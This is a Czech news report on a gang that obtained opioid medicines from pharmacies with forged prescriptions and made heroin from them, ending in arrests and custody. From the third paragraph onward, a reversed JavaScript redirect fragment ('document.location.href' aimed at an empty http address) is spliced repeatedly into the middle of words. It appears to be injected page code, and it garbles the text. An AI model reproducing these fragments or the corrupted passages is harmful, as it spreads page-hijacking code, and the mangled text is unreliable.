Rainbow page separator

Na falešné recepty vyzvedávali léky, vyráběli z nich heroin

Středa, 24. února 2021

Vysočina / Šestici pachatelů kriminalisté dokázali, že minimálně ve 28 případech na různých místech Vysočiny předložila v lékárnách falešný recept a podvodem si tak opatřila léky, z nichž jeden z nich vyráběl heroin. Další falešné recepty pak podvodníci z Prahy, Středočeského a Pardubického kraje zneužili v jiných částech republiky. Pět z nich je stíháno vazebně a jeden na svobodě. Na případu pracovali krajští kriminalisté téměř rok, než v Praze a jejím okolí zadrželi šest osob.
„Jedná se o tři muže ve věku od 45 do 48 let a o tři ženy ve věku 35 až 46 let. Při jejich zadržení spolupracovali kriminalisté s pražskou zásahovou jednotkou a s policisty ze speciální jednotky Dukovany,“ uvedla policejní mluvčí Dana Čírtková. V případě prokázání viny hrozí pachatelům až deset let vězení.
Šestičlenná skupina si od začátku roku 2019 do začátku le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního února podvodně opatřovala léky Vendal Retard a Durogesic, které jsou dostupné pouze na lékařský předpis a obsahují návykové látky. „K získání léků nejprve padělali lékařský předpis a na základě tak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vytvořeného receptu si léky vyzvedli v některé z lékáren na území republiky. Z léků pak jeden z pachatelů vyráběl heroin, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zčásti pro svoji potřebu, část poté prodávali dosud nezjištěným osobám,“ uvedl k případu vedoucí odboru obecné kriminality Krajského ředitelství policie Kraje Vysočina Pavel Kubiš.
Vyšetřovatel podal státnímu zástupci podnět k vypracování návrhu na vazební stíhání pěti obviněných. Státní zástupce podnět akcep[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval a okresní soud návrhu vyhověl. Před okresním soudem v Jihlavě se uskutečnilo vazební jednání a na pět pachatelů byla uvalena vazba, kdy byli od soudu eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továni do vazební věznice. Šestý obviněný muž je stíhaný na svobodě. „Všichni obvinění mají boha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou trestní minulost. Navíc se jedná o osoby, které byly silně závislé na užívání drog,“ doplnil Pavel Kubiš.